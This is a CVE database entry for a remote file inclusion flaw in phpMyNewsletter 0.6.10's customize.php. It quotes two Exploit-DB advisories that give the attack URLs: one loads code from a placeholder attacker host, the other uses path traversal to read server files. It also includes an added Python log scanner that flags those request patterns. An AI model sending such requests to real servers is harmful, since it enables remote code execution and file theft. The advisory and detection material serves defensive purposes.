CVE-2002-1887
Published 2002-12-31
Priority P3 37 | high | 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 3.01% (85.7th percentile)
PHP remote file inclusion vulnerability in customize.php for phpMyNewsletter 0.6.10 allows remote attackers to execute arbitrary PHP code via the l parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gregory_kokanosky | phpmynewsletter | — | — |
No detection rules found.
Exploit-DB
phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
exploitdb·2007-04-04
---
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°°°°°°°°°
---- /include/customize.php ----
---- /include/customize.php ----
Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
or
http://[target]/include/customize.php?l=../path/file/to/view
Patch :
°°°°°°°
Author has been alerted and the last version (0.7beta1) has been patched.
More details
- in French :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphp
Exploit-DB
phpMyNewsletter 0.6.10 - Remote File Inclusion
exploitdb·2002-10-03
---
source: https://www.securityfocus.com/bid/5886/info
A vulnerability has been discovered in phpMyNewsLetter.
Reportedly, it is possible to pass an attacker-specified file include location to a CGI parameter of the 'customize.php' script.
This may allow an attacker to execute arbitrary commands with the privileges of the webserver.
Additionally, an attacker may exploit this problem to view local webserver readable files.
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
or
http://[target]/include/customize.php?l=../path/file/to/view
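An added example, not part of the advisories or of phpMyNewsletter: a web-server log scan that flags requests to customize.php whose l parameter carries a URL scheme or a path traversal, the two request shapes described above. The log lines, the benign value l=en and the function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the advisory); IPs and hosts are documentation values.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Oct/2002:10:01:11 +0000] "GET /include/customize.php?l=en&text=Hi HTTP/1.0" 200 512
198.51.100.9 - - [03/Oct/2002:10:02:40 +0000] "GET /include/customize.php?l=http://attacker.example/code.txt&text=Hello%20World HTTP/1.0" 200 90
203.0.113.4 - - [03/Oct/2002:10:03:02 +0000] "GET /include/customize.php?l=../path/file/to/view HTTP/1.0" 200 1340
203.0.113.4 - - [03/Oct/2002:10:03:09 +0000] "GET /include/customize.php?l=%2e%2e%2fpath%2ffile HTTP/1.0" 200 1340
198.51.100.7 - - [03/Oct/2002:10:04:00 +0000] "GET /index.php?l=../x HTTP/1.0" 404 210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.I)  # http:, ftp:, php: ...

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_l(value):
    """Return a verdict for one value of the 'l' parameter, or None if it looks plain."""
    v = decode_fully(value).replace("\\", "/")
    if SCHEME_RE.match(v) or v.startswith("//"):
        return "remote-include"
    if v.startswith("/") or ".." in v.split("/") or "\x00" in v:
        return "path-traversal"
    return None

def scan(log_text):
    """Return (line number, client IP, verdict) for suspicious customize.php requests."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/customize.php"):
            continue  # only the script named in the advisory is in scope
        for value in parse_qs(url.query, keep_blank_values=True).get("l", []):
            verdict = classify_l(value)
            if verdict:
                findings.append((lineno, line.split()[0], verdict))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```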
No writeups or analysis indexed.
- http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.html
- http://secunia.com/advisories/7220
- http://www.iss.net/security_center/static/10288.php
- http://www.securityfocus.com/bid/5886
2002-12-31
Published